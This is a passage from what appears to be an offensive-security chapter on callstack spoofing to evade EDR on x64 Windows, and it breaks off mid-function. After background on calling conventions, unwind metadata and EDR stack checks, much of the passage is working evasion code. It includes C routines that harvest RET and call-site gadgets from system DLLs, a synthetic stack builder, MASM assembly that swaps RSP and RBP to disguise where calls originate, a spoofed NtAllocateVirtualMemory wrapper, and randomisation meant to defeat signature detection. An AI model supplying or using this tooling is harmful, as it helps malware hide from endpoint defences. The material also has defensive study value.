Modern EDR systems have evolved beyond simple API hooking. They now examine the call stack at the moment of sensitive API invocations, asking a crucial question: "Where did this call originate?" When NtAllocateVirtualMemory is called directly from an unknown memory region rather than through the expected kernel32.dll → kernelbase.dll → ntdll.dll chain, alarm bells ring. Callstack spoofing addresses this by constructing fake stack frames that make malicious calls appear to originate from legitimate code paths.
Understanding callstack analysis and spoofing requires deep knowledge of x64 calling conventions, stack frame layout, and the Windows exception handling infrastructure. This chapter explores how security products analyze stacks, why certain patterns trigger detection, and the techniques used to construct convincing false call histories.
THE CALLSTACK ANALYSIS PROBLEM
==============================
SUSPICIOUS CALL (Detected):
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ NtAllocateVirtualMemory called from: │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Stack Frame 0: ntdll!NtAllocateVirtualMemory │ │
│ │ Return Address: 0x00000001400012AB ◄── UNKNOWN MODULE! │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 1: ??? (0x00000001400012AB) │ │
│ │ Return Address: 0x0000000140001000 ◄── RWX MEMORY! │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 2: ??? │ │
│ │ Return Address: (invalid) ◄── BROKEN CHAIN! │ │
│ └───────────────────────────────────────────────────────────┘ │
│ │
│ EDR Analysis: "Syscall stub called from unbacked memory" │
│ Result: BLOCKED / ALERT │
│ │
└─────────────────────────────────────────────────────────────────────┘
LEGITIMATE CALL (Expected):
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ NtAllocateVirtualMemory called from: │
│ │
│ ┌───────────────────────────────────────────────────────────┐ │
│ │ Stack Frame 0: ntdll!NtAllocateVirtualMemory │ │
│ │ Return Address: kernelbase+0x1A2B3 ◄── Known offset │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 1: kernelbase!VirtualAllocEx │ │
│ │ Return Address: kernel32+0x5C7D2 ◄── Expected chain │ │
│ ├───────────────────────────────────────────────────────────┤ │
│ │ Stack Frame 2: kernel32!VirtualAlloc │ │
│ │ Return Address: app.exe+0x12AB ◄── Signed module │ │
│ └───────────────────────────────────────────────────────────┘ │
│ │
│ EDR Analysis: "Normal API call chain" │
│ Result: ALLOWED │
│ │
└─────────────────────────────────────────────────────────────────────┘
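The difference between the two diagrams above comes down to whether each return address falls inside a loaded image. As a minimal sketch of that "module backing" test, assuming a hypothetical ModuleRange record and made-up load addresses (a real analyzer would take these from the loader's module list or from memory-region queries):

```c
#include <stddef.h>
#include <stdint.h>

/* One loaded image as a stack analyzer might record it.
   The type and all values used with it are hypothetical. */
typedef struct {
    const char *name;   /* module name, e.g. "kernelbase.dll" */
    uint64_t    base;   /* load address */
    uint64_t    size;   /* size of the mapped image in bytes */
} ModuleRange;

/* Return the module containing addr, or NULL when the address is
   "unbacked" (not inside any known image). */
const ModuleRange *find_backing_module(const ModuleRange *mods, size_t count,
                                       uint64_t addr)
{
    for (size_t i = 0; i < count; i++) {
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size)
            return &mods[i];
    }
    return NULL;
}

/* Count the return addresses that no known module accounts for. */
size_t count_unbacked(const ModuleRange *mods, size_t count,
                      const uint64_t *ret_addrs, size_t n)
{
    size_t unbacked = 0;
    for (size_t i = 0; i < n; i++) {
        if (find_backing_module(mods, count, ret_addrs[i]) == NULL)
            unbacked++;
    }
    return unbacked;
}
```

A non-zero result from count_unbacked corresponds to the "UNKNOWN MODULE" rows in the first diagram. Signature and trust checks on the matched module would be separate steps.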
Before we can spoof call stacks, we must thoroughly understand how they're constructed. The x64 calling convention defines specific rules for parameter passing, stack alignment, and frame organization.
On 64-bit Windows, the first four integer or pointer arguments are passed in RCX, RDX, R8, and R9 (floating-point arguments use XMM0 through XMM3 in the same positions), and any further arguments go on the stack. The caller must keep RSP 16-byte aligned at each CALL and reserve 32 bytes of "shadow space" directly above the return address, where the callee may spill its register parameters.
x64 STACK FRAME ANATOMY
=======================
When Function A calls Function B:
High Memory
┌─────────────────────────────────────────────────────────────────┐
│ │
│ Function A's Stack Frame │
│ ├── A's local variables │
│ ├── A's saved non-volatile registers (if any) │
│ │ │
│ │ (offsets below are relative to RSP at entry to B) │
│ ├── ...more parameters... │
│ ├── Parameter 6 (if exists) [RSP+0x30] │
│ ├── Parameter 5 (if exists) [RSP+0x28] │
│ │ │
│ ├── Shadow space for R9 [RSP+0x20] │
│ ├── Shadow space for R8 [RSP+0x18] │
│ ├── Shadow space for RDX [RSP+0x10] │
│ ├── Shadow space for RCX [RSP+0x08] │
│ │ ▲ │
│ │ [Before CALL instruction, RSP points here] │
│ │
├─────────────────────────────────────────────────────────────────┤
│ CALL instruction executes → pushes return address │
├─────────────────────────────────────────────────────────────────┤
│ Return Address (8 bytes) [RSP] ◄── Key! │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Function B's Stack Frame (after prologue) │
│ ├── Saved RBP (if frame pointer used) [RSP-0x08] │
│ ├── Saved non-volatile registers │
│ ├── Local variables │
│ ├── ... │
│ │
└─────────────────────────────────────────────────────────────────┘
Low Memory
Key Points:
• Return address is at [RSP] immediately after CALL
• Shadow space (32 bytes) is mandatory for every call
• RSP must be 16-byte aligned at the CALL instruction (so RSP % 16 == 8 at callee entry)
• RBP may or may not be used as frame pointer
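The alignment and shadow-space rules above reduce to a little arithmetic. The following is a minimal sketch of it; the function names are illustrative and not part of any Windows API:

```c
#include <stddef.h>
#include <stdint.h>

/* Bytes a caller must reserve for one outgoing call: at least the
   32-byte shadow space (four 8-byte home slots), plus 8 bytes per
   stack-passed argument, rounded up so RSP stays 16-byte aligned
   at the CALL instruction. */
size_t outgoing_call_area(size_t arg_count)
{
    size_t slots = arg_count < 4 ? 4 : arg_count;
    size_t bytes = slots * 8;
    return (bytes + 15) & ~(size_t)15;
}

/* Offset of 1-based argument n from RSP at callee entry.
   [RSP+0] holds the return address, so argument 1's home slot is
   at +0x08 and argument 5 is at +0x28. */
size_t arg_offset_at_entry(size_t n)
{
    return 8 * n;
}

/* RSP is 16-byte aligned at the CALL; pushing the 8-byte return
   address leaves it at 8 modulo 16 when the callee starts. */
int is_valid_entry_rsp(uint64_t rsp)
{
    return (rsp & 15) == 8;
}
```

For a six-argument call such as NtAllocateVirtualMemory, outgoing_call_area(6) gives 48 bytes: 32 bytes of shadow space plus two stack-passed arguments.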
Traditional stack walking relies on the frame pointer (RBP) forming a linked list. Each frame's saved RBP points to the previous frame's RBP, creating a chain that can be traversed to enumerate all callers.
// Manual stack walk using the RBP chain.
// Only meaningful when the walked functions keep RBP as a frame pointer.
#include <windows.h>
#include <stdio.h>
void WalkStackUsingRBP(void) {
    CONTEXT ctx;
    ULONG_PTR ulLow = 0, ulHigh = 0;
    // Capture the current register state, including RBP
    RtlCaptureContext(&ctx);
    // Stack bounds let us reject frame pointers that leave this thread's stack
    GetCurrentThreadStackLimits(&ulLow, &ulHigh);
    ULONG_PTR ulRbp = (ULONG_PTR)ctx.Rbp;
    printf("Stack Walk via RBP Chain:\n");
    int nFrame = 0;
    while (nFrame < 20 && ulRbp >= ulLow && ulRbp + 16 <= ulHigh) {
        // At each frame:
        // [RBP] = saved previous RBP (next in chain)
        // [RBP+8] = return address
        ULONG_PTR ulPrevRbp = *(ULONG_PTR*)ulRbp;
        ULONG_PTR ulRetAddr = *(ULONG_PTR*)(ulRbp + 8);
        printf(" Frame %d: RBP=0x%p, Return=0x%p\n",
               nFrame, (PVOID)ulRbp, (PVOID)ulRetAddr);
        // Older frames live at higher addresses; anything else is a broken chain
        if (ulPrevRbp <= ulRbp) break;
        ulRbp = ulPrevRbp;
        nFrame++;
    }
}
However, most x64 Windows code is compiled without a frame pointer, leaving RBP free as a general-purpose register (the x64 counterpart of x86 frame pointer omission, FPO). An RBP chain walk is therefore unreliable on its own, and such functions can only be walked using metadata.
Windows doesn't rely solely on frame pointers for stack walking. Instead, it uses rich metadata stored in the PE file that describes each function's stack usage.
Every non-leaf function in a PE file has a corresponding RUNTIME_FUNCTION entry in the .pdata section. This entry describes where the function starts, ends, and points to UNWIND_INFO describing how to restore the stack.
EXCEPTION HANDLING METADATA
===========================
.pdata Section (RUNTIME_FUNCTION array):
┌─────────────────────────────────────────────────────────────────┐
│ │
│ RUNTIME_FUNCTION Entry: │
│ ┌─────────────────────────────────────────────────────────┐ │
│ │ BeginAddress (DWORD) ─► RVA of function start │ │
│ │ EndAddress (DWORD) ─► RVA of function end │ │
│ │ UnwindData (DWORD) ─► RVA of UNWIND_INFO │ │
│ └─────────────────────────────────────────────────────────┘ │
│ │
│ Example: │
│ { 0x00001000, 0x00001500, 0x00008000 } │
│ │
│ Means: Function at RVA 0x1000-0x1500, unwind at 0x8000 │
│ │
└─────────────────────────────────────────────────────────────────┘
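Because the .pdata entries are sorted by BeginAddress, locating the entry that covers a given RVA is a binary search. The sketch below illustrates the idea with a locally defined struct that mirrors the three DWORD fields. It is not the implementation of RtlLookupFunctionEntry, which also handles dynamic function tables and chained unwind info.

```c
#include <stddef.h>
#include <stdint.h>

/* Local mirror of the three RUNTIME_FUNCTION fields (all RVAs). */
typedef struct {
    uint32_t begin_rva;   /* first byte of the function */
    uint32_t end_rva;     /* one past the last byte of the function */
    uint32_t unwind_rva;  /* location of the UNWIND_INFO */
} RuntimeFunction;

/* Binary search a table sorted by begin_rva for the entry covering rva.
   Returns NULL when no entry covers it (leaf code, or not code at all). */
const RuntimeFunction *lookup_function(const RuntimeFunction *table,
                                       size_t count, uint32_t rva)
{
    size_t lo = 0, hi = count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (rva < table[mid].begin_rva)
            hi = mid;                 /* target lies in the lower half */
        else if (rva >= table[mid].end_rva)
            lo = mid + 1;             /* target lies in the upper half */
        else
            return &table[mid];       /* begin_rva <= rva < end_rva */
    }
    return NULL;
}
```

With the example entry from the diagram, an RVA of 0x1234 resolves to the { 0x1000, 0x1500, 0x8000 } entry, while 0x1500 itself does not, because the end address is exclusive.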
UNWIND_INFO Structure:
┌─────────────────────────────────────────────────────────────────┐
│ │
│ ┌─────────────────────────────────────────────────────────┐ │
│ │ Version (3 bits) │ Usually 1 │ │
│ │ Flags (5 bits) │ UNW_FLAG_* values │ │
│ │ SizeOfProlog (byte) │ Size of function prologue │ │
│ │ CountOfCodes (byte) │ Number of unwind codes │ │
│ │ FrameRegister (4 bits) │ Which register is frame ptr │ │
│ │ FrameOffset (4 bits) │ RSP-to-frame offset, in units of 16 bytes │ │
│ │ UnwindCode[n] │ Array of unwind operations │ │
│ └─────────────────────────────────────────────────────────┘ │
│ │
│ Unwind codes describe stack operations: │
│ • UWOP_PUSH_NONVOL - Register was pushed │
│ • UWOP_ALLOC_LARGE - Large stack allocation │
│ • UWOP_ALLOC_SMALL - Small stack allocation │
│ • UWOP_SET_FPREG - Frame pointer established │
│ • etc. │
│ │
└─────────────────────────────────────────────────────────────────┘
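To make the bit layout above concrete, here is a minimal sketch that decodes the four header bytes and totals the fixed stack allocation described by the most common unwind codes. That total is how an unwinder knows how far above RSP the return address sits once the prologue has run. The struct and function names are illustrative. Chained unwind info, register-save codes, and machine frames are deliberately not handled and are reported as -1.

```c
#include <stddef.h>
#include <stdint.h>

enum { UWOP_PUSH_NONVOL = 0, UWOP_ALLOC_LARGE = 1,
       UWOP_ALLOC_SMALL = 2, UWOP_SET_FPREG   = 3 };

typedef struct {
    uint8_t version, flags, prolog_size, code_count;
    uint8_t frame_reg, frame_offset;
} UnwindHeader;

/* Split the first four UNWIND_INFO bytes into their fields. */
UnwindHeader decode_unwind_header(const uint8_t *info)
{
    UnwindHeader h;
    h.version      = info[0] & 0x07;  /* low 3 bits */
    h.flags        = info[0] >> 3;    /* high 5 bits */
    h.prolog_size  = info[1];
    h.code_count   = info[2];
    h.frame_reg    = info[3] & 0x0F;  /* low 4 bits */
    h.frame_offset = info[3] >> 4;    /* high 4 bits, scaled by 16 */
    return h;
}

/* Total bytes the prologue subtracts from RSP, or -1 if an unwind
   code outside the handled subset is encountered. */
int64_t fixed_frame_bytes(const uint8_t *info)
{
    UnwindHeader h = decode_unwind_header(info);
    const uint8_t *codes = info + 4;  /* 2-byte slots follow the header */
    int64_t total = 0;
    size_t i = 0;

    while (i < h.code_count) {
        uint8_t op   = codes[2 * i + 1] & 0x0F;
        uint8_t arg  = codes[2 * i + 1] >> 4;
        size_t  left = h.code_count - i;

        if (op == UWOP_PUSH_NONVOL) {
            total += 8; i += 1;
        } else if (op == UWOP_ALLOC_SMALL) {
            total += 8 * (int64_t)arg + 8; i += 1;
        } else if (op == UWOP_ALLOC_LARGE && arg == 0 && left >= 2) {
            /* next slot holds size / 8 as a 16-bit value */
            uint32_t scaled = codes[2 * i + 2]
                            | ((uint32_t)codes[2 * i + 3] << 8);
            total += 8 * (int64_t)scaled; i += 2;
        } else if (op == UWOP_ALLOC_LARGE && arg == 1 && left >= 3) {
            /* next two slots hold the unscaled 32-bit size */
            uint32_t size = codes[2 * i + 2]
                          | ((uint32_t)codes[2 * i + 3] << 8)
                          | ((uint32_t)codes[2 * i + 4] << 16)
                          | ((uint32_t)codes[2 * i + 5] << 24);
            total += size; i += 3;
        } else if (op == UWOP_SET_FPREG) {
            i += 1;                   /* no change to the allocation */
        } else {
            return -1;
        }
    }
    return total;
}
```

For a prologue of "push rbx; sub rsp, 20h", the codes are ALLOC_SMALL (info 3) followed by PUSH_NONVOL, giving 32 + 8 = 40 bytes, so the return address is at RSP+40 after the prologue.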
Windows uses RtlVirtualUnwind to walk the stack one frame at a time. Given a context (register state) and the current instruction pointer, it finds the RUNTIME_FUNCTION, decodes the UNWIND_INFO, and computes the previous frame's state.
#include <windows.h>
#include <stdio.h>
// Demonstrate RtlVirtualUnwind usage
void WalkStackProperly(PCONTEXT pContext) {
CONTEXT ctx = *pContext;
KNONVOLATILE_CONTEXT_POINTERS nvCtx = { 0 };
printf("Stack Walk via RtlVirtualUnwind:\n");
int nFrame = 0;
while (ctx.Rip && nFrame < 20) {
// Lookup RUNTIME_FUNCTION for current RIP
DWORD64 dwImageBase = 0;
PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
ctx.Rip,
&dwImageBase,
NULL // Optional unwind history table (lookup cache); not used here
);
printf(" Frame %d: RIP=0x%llX", nFrame, ctx.Rip);
if (pRtFunc) {
// Has unwind info - use it
PVOID pHandlerData = NULL;
DWORD64 dwEstablisherFrame = 0;
RtlVirtualUnwind(
UNW_FLAG_NHANDLER,
dwImageBase,
ctx.Rip,
pRtFunc,
&ctx,
&pHandlerData,
&dwEstablisherFrame,
&nvCtx
);
printf(" (has RUNTIME_FUNCTION)\n");
}
else {
// Leaf function - return address is at [RSP]
ctx.Rip = *(PDWORD64)ctx.Rsp;
ctx.Rsp += 8;
printf(" (leaf function)\n");
}
nFrame++;
}
}
Understanding what EDRs look for helps us understand what we need to fake. Modern EDRs perform sophisticated stack analysis during sensitive operations.
EDR STACK ANALYSIS CHECKLIST
============================
For each stack frame, EDRs typically verify:
1. MODULE BACKING
┌────────────────────────────────────────────────────────────┐
│ • Is the return address within a loaded module? │
│ • Is that module signed? Trusted? │
│ • Is it mapped from disk (not private memory)? │
└────────────────────────────────────────────────────────────┘
Detection: Direct syscall from shellcode → ALERT
2. VALID CHAIN
┌────────────────────────────────────────────────────────────┐
│ • Does the RBP chain form a valid linked list? │
│ • Are all RBP values within the thread's stack? │
│ • Does the chain reach a reasonable end? │
└────────────────────────────────────────────────────────────┘
Detection: Broken chain or circular reference → ALERT
3. RUNTIME_FUNCTION ENTRIES
┌────────────────────────────────────────────────────────────┐
│ • Does each return address have a RUNTIME_FUNCTION? │
│ • Exception: Leaf code, only at the innermost frame │
│ • Exception: Dynamic code (JIT, trampolines) │
└────────────────────────────────────────────────────────────┘
Detection: Return to address without metadata → SUSPICIOUS
4. RETURN ADDRESS VALIDITY
┌────────────────────────────────────────────────────────────┐
│ • Is the return address right after a CALL instruction? │
│ • Does it make sense given the function boundaries? │
│ • Is it inside a known function? │
└────────────────────────────────────────────────────────────┘
Detection: Return to middle of instruction → ALERT
5. EXPECTED CALL PATTERNS
┌────────────────────────────────────────────────────────────┐
│ • Does the chain match known API patterns? │
│ • e.g., NtAllocateVirtualMemory should be called via │
│ VirtualAlloc → VirtualAllocEx → NtAllocateVirtual... │
└────────────────────────────────────────────────────────────┘
Detection: Unusual caller for syscall → SUSPICIOUS
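Check 4 in the list above can be approximated without a full disassembler by looking at the bytes immediately before a return address. The sketch below is a heuristic, not a decoder: it recognizes "E8 rel32" and the "FF /2" indirect forms, and a data byte that happens to equal E8 or FF can produce a false match. The function names are illustrative.

```c
#include <stddef.h>
#include <stdint.h>

/* Length of an "FF /2" near indirect CALL starting at p, or 0 if the
   bytes are not such an instruction. A REX prefix sits before FF and
   does not change where the instruction ends. */
static size_t indirect_call_len(const uint8_t *p, size_t avail)
{
    if (avail < 2 || p[0] != 0xFF)
        return 0;
    uint8_t mod = p[1] >> 6, reg = (p[1] >> 3) & 7, rm = p[1] & 7;
    if (reg != 2)
        return 0;                     /* only /2 is a near indirect CALL */
    size_t len = 2;
    if (mod == 3)
        return len;                   /* call reg */
    if (rm == 4) {                    /* SIB byte follows */
        if (avail < 3)
            return 0;
        len += 1;
        if (mod == 0 && (p[2] & 7) == 5)
            len += 4;                 /* SIB with disp32 and no base */
    } else if (mod == 0 && rm == 5) {
        len += 4;                     /* RIP-relative disp32 */
    }
    if (mod == 1) len += 1;           /* disp8 */
    if (mod == 2) len += 4;           /* disp32 */
    return len <= avail ? len : 0;
}

/* Return 1 if the bytes ending at code[ret_off] look like a CALL,
   meaning ret_off is a plausible return address. */
int follows_call(const uint8_t *code, size_t size, size_t ret_off)
{
    if (ret_off > size)
        return 0;
    if (ret_off >= 5 && code[ret_off - 5] == 0xE8)
        return 1;                     /* call rel32 */
    for (size_t n = 2; n <= 7 && n <= ret_off; n++) {
        if (indirect_call_len(code + ret_off - n, n) == n)
            return 1;                 /* call r/m64 ending exactly here */
    }
    return 0;
}
```

An address that follows "FF E0" (jmp rax) or plain padding is rejected, while one that follows "FF 15 disp32" or "call rax" is accepted.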
EDRs typically capture stacks in kernel callbacks or through instrumentation. They may use:
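// Kernel-mode stack capture (simplified concept; GetCurrentTrapFrame and
// AnalyzeStackFrames are placeholders, not real kernel APIs)
VOID OnSyscallEntry(DWORD dwSyscallNumber) {
KTRAP_FRAME* pTrapFrame = GetCurrentTrapFrame();
// Capture raw user-mode stack slots starting at RSP. These are stack
// contents, not decoded frames; the analyzer must pick out return addresses.
PVOID pUserStack[32] = { 0 };
ULONG ulCaptured = 0;
__try {
ProbeForRead((PVOID)pTrapFrame->Rsp, sizeof(pUserStack), 1);
for (ulCaptured = 0; ulCaptured < 32; ulCaptured++) {
pUserStack[ulCaptured] = *(PVOID*)(pTrapFrame->Rsp + ulCaptured * sizeof(PVOID));
}
}
__except(EXCEPTION_EXECUTE_HANDLER) {
// Invalid stack access: keep only the slots read before the fault
}
// Analyze only the slots that were actually captured
AnalyzeStackFrames(pUserStack, ulCaptured, dwSyscallNumber);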
}
The simplest spoofing technique replaces the return address with an address inside a legitimate module. When the EDR examines the stack, it sees a return to known code rather than our malicious module.
A "gadget" is a small code sequence we can use as a fake return target. The simplest is just a RET instruction (0xC3). When execution "returns" to this gadget, it immediately returns again, continuing the chain.
#include <windows.h>
// Find a RET instruction in a legitimate module
PVOID FindRetGadget(HMODULE hModule) {
PBYTE pBase = (PBYTE)hModule;
// Get module bounds from PE headers
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
SIZE_T sSize = pNt->OptionalHeader.SizeOfImage;
// Search for RET (0xC3) instruction
// Search in .text section for executable code
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
PBYTE pCode = pBase + pSection[i].VirtualAddress;
SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;
for (SIZE_T j = 0; j < sCodeSize; j++) {
if (pCode[j] == 0xC3) {
return &pCode[j];
}
}
}
}
return NULL;
}
// Find "pop rbp; ret" gadget (0x5D 0xC3)
// Useful for maintaining RBP chain
PVOID FindPopRbpRetGadget(HMODULE hModule) {
PBYTE pBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
PBYTE pCode = pBase + pSection[i].VirtualAddress;
SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;
for (SIZE_T j = 0; j < sCodeSize - 1; j++) {
if (pCode[j] == 0x5D && pCode[j + 1] == 0xC3) {
return &pCode[j];
}
}
}
}
return NULL;
}
For more convincing spoofing, we find addresses that look like real return addresses—locations immediately after CALL instructions within legitimate functions.
#include <windows.h>
typedef struct _CALL_SITE_INFO {
PVOID pAddress; // Address right after CALL instruction
PVOID pFunctionStart; // Start of containing function
SIZE_T sOffset; // Offset within function
} CALL_SITE_INFO, *PCALL_SITE_INFO;
// Find addresses that follow CALL instructions
// These look like legitimate return addresses
DWORD FindCallSites(
HMODULE hModule,
PCALL_SITE_INFO pSites,
DWORD dwMaxSites
) {
PBYTE pBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
// Find .text section
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
PBYTE pText = NULL;
SIZE_T sTextSize = 0;
for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
if (strcmp((char*)pSection[i].Name, ".text") == 0) {
pText = pBase + pSection[i].VirtualAddress;
sTextSize = pSection[i].Misc.VirtualSize;
break;
}
}
if (!pText) return 0;
DWORD dwFound = 0;
// Search for CALL instructions
for (SIZE_T i = 0; i < sTextSize - 5 && dwFound < dwMaxSites; i++) {
// E8 xx xx xx xx = CALL rel32 (relative near call)
if (pText[i] == 0xE8) {
// The byte after CALL is where execution returns
PVOID pReturnSite = &pText[i + 5];
pSites[dwFound].pAddress = pReturnSite;
pSites[dwFound].sOffset = i + 5;
dwFound++;
}
// FF 15 xx xx xx xx = CALL [rip+rel32] (indirect call via memory)
else if (pText[i] == 0xFF && pText[i + 1] == 0x15) {
PVOID pReturnSite = &pText[i + 6];
pSites[dwFound].pAddress = pReturnSite;
pSites[dwFound].sOffset = i + 6;
dwFound++;
}
}
return dwFound;
}
More sophisticated spoofing builds complete fake stack frames that maintain proper RBP chains and shadow space. This survives deeper stack analysis.
#include <windows.h>
// A synthetic stack frame
typedef struct _SYNTHETIC_FRAME {
PVOID pSavedRbp; // Points to next frame's saved RBP
PVOID pReturnAddress; // Fake return address in legitimate module
BYTE bShadowSpace[32];// Shadow space (required by calling convention)
} SYNTHETIC_FRAME, *PSYNTHETIC_FRAME;
// Collection of frames forming a fake call stack
typedef struct _SPOOF_STACK {
BYTE bMemory[4096]; // Memory for synthetic frames
PVOID pStackTop; // Top of our synthetic stack
DWORD dwFrameCount; // Number of frames
PVOID pRealReturnAddress; // Where to actually return
} SPOOF_STACK, *PSPOOF_STACK;
#include <windows.h>
typedef struct _GADGET_COLLECTION {
PVOID pGadgets[32];
char szModules[32][64];
DWORD dwCount;
} GADGET_COLLECTION, *PGADGET_COLLECTION;
// Collect gadgets from multiple trusted modules
BOOL CollectGadgets(PGADGET_COLLECTION pColl) {
const wchar_t* wszModules[] = {
L"kernel32.dll",
L"kernelbase.dll",
L"ntdll.dll",
L"user32.dll",
L"advapi32.dll",
NULL
};
pColl->dwCount = 0;
for (int i = 0; wszModules[i] && pColl->dwCount < 32; i++) {
HMODULE hMod = GetModuleHandleW(wszModules[i]);
if (!hMod) hMod = LoadLibraryW(wszModules[i]);
if (!hMod) continue;
PVOID pGadget = FindRetGadget(hMod);
if (pGadget) {
pColl->pGadgets[pColl->dwCount] = pGadget;
WideCharToMultiByte(CP_ACP, 0, wszModules[i], -1,
pColl->szModules[pColl->dwCount], 64, NULL, NULL);
pColl->dwCount++;
}
}
return pColl->dwCount > 0;
}
// Build a synthetic stack with specified depth
PVOID BuildSyntheticStack(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
PVOID pRealReturn,
DWORD dwFrameDepth
) {
// Start at top of our stack memory
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
// Reserve space and align to 16 bytes
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
// Build frames from bottom (oldest) to top (newest)
PVOID pNextRbp = NULL;
for (DWORD i = 0; i < dwFrameDepth; i++) {
// Select a gadget (vary by frame for realism)
PVOID pGadget = pGadgets->pGadgets[i % pGadgets->dwCount];
// Reserve shadow space
pCurrent -= 32;
// Return address
pCurrent -= 8;
*(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;
// Saved RBP (points to next frame's RBP location)
pCurrent -= 8;
*(PVOID*)pCurrent = pNextRbp;
pNextRbp = pCurrent; // This frame's RBP will be previous frame's saved RBP
}
pStack->pStackTop = pCurrent;
pStack->pRealReturnAddress = pRealReturn;
pStack->dwFrameCount = dwFrameDepth;
return pCurrent;
}
Actually using the spoofed stack requires assembly code to switch stacks and make the call. C code alone cannot manipulate RSP and RBP safely during a function call.
; spoofcall.asm - x64 MASM assembly for stack spoofing
.code
; GetCurrentReturnAddress - get the return address of our caller
; Returns: RAX = return address
GetReturnAddress PROC
mov rax, [rsp] ; Return address is at [RSP]
ret
GetReturnAddress ENDP
; SpoofedCall - Make a call with a spoofed stack
;
; Parameters:
; RCX = pSpoofStack - Pointer to SPOOF_STACK structure
; RDX = pTargetFunction - Function to call
; R8 = pArg1 - First argument to target
; R9 = pArg2 - Second argument to target
; [RSP+0x28] = pArg3 - Third argument
; [RSP+0x30] = pArg4 - Fourth argument
;
; The SPOOF_STACK structure:
; +0x000: Memory buffer for synthetic stack
; +0x1000: pStackTop (PVOID)
; +0x1008: dwFrameCount (DWORD)
; +0x1010: pRealReturnAddress (PVOID)
SPOOF_STACK_TOP_OFFSET EQU 1000h
SPOOF_REAL_RETURN_OFFSET EQU 1010h
SpoofedCall PROC
; Save non-volatile registers
push rbx
push rsi
push rdi
push rbp
push r12
push r13
push r14
push r15
; Save parameters
mov r12, rcx ; pSpoofStack
mov r13, rdx ; pTargetFunction
mov r14, r8 ; pArg1
mov r15, r9 ; pArg2
; Save original stack
mov rbx, rsp
mov rsi, rbp
; Load spoofed stack pointer
mov rsp, [r12 + SPOOF_STACK_TOP_OFFSET]
; Set RBP to point to first synthetic frame
mov rbp, rsp
; Allocate shadow space for target call
sub rsp, 20h
; Setup arguments for target function
mov rcx, r14 ; Arg1
mov rdx, r15 ; Arg2
mov r8, [rbx + 68h] ; Arg3 (from original stack, accounting for pushes)
mov r9, [rbx + 70h] ; Arg4
; Call target function
; EDR will see our spoofed stack when it examines!
call r13
; Save return value
mov r12, rax
; Restore original stack
mov rsp, rbx
mov rbp, rsi
; Return value
mov rax, r12
; Restore non-volatile registers
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rdi
pop rsi
pop rbx
ret
SpoofedCall ENDP
END
#include <windows.h>
// Assembly function declaration
extern NTSTATUS SpoofedCall(
PSPOOF_STACK pSpoofStack,
PVOID pTargetFunction,
PVOID pArg1,
PVOID pArg2,
PVOID pArg3,
PVOID pArg4
);
// High-level wrapper for common APIs
NTSTATUS SpoofedNtAllocateVirtualMemory(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
) {
// Get the target function
typedef NTSTATUS (NTAPI* fnNtAllocateVirtualMemory)(
HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
);
fnNtAllocateVirtualMemory pNtAlloc =
(fnNtAllocateVirtualMemory)GetProcAddress(
GetModuleHandleW(L"ntdll.dll"),
"NtAllocateVirtualMemory"
);
// Build spoofed stack with 5 frames
BuildSyntheticStack(pStack, pGadgets, _ReturnAddress(), 5);
// Make the call with spoofed stack
// Note: Would need to adjust assembly for 6 parameters
return SpoofedCall(
pStack,
pNtAlloc,
(PVOID)ProcessHandle,
(PVOID)BaseAddress,
(PVOID)ZeroBits,
(PVOID)RegionSize
// AllocationType and Protect need different handling
);
}
Static spoofed stacks create detectable patterns. Randomizing frame count and gadget selection helps evade signature-based detection.
#include <windows.h>
// Generate pseudo-random numbers without suspicious RNG calls
DWORD GetPseudoRandom(void) {
LARGE_INTEGER li;
QueryPerformanceCounter(&li);
return (DWORD)(li.QuadPart ^ (li.QuadPart >> 17));
}
// Build randomized synthetic stack
PVOID BuildRandomizedStack(
PSPOOF_STACK pStack,
PGADGET_COLLECTION pGadgets,
PVOID pRealReturn
) {
// Random frame count between 4 and 10
DWORD dwRandom = GetPseudoRandom();
DWORD dwFrameCount = 4 + (dwRandom % 7);
// Build with random frame count
PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
pCurrent -= 256;
pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);
PVOID pNextRbp = NULL;
for (DWORD i = 0; i < dwFrameCount; i++) {
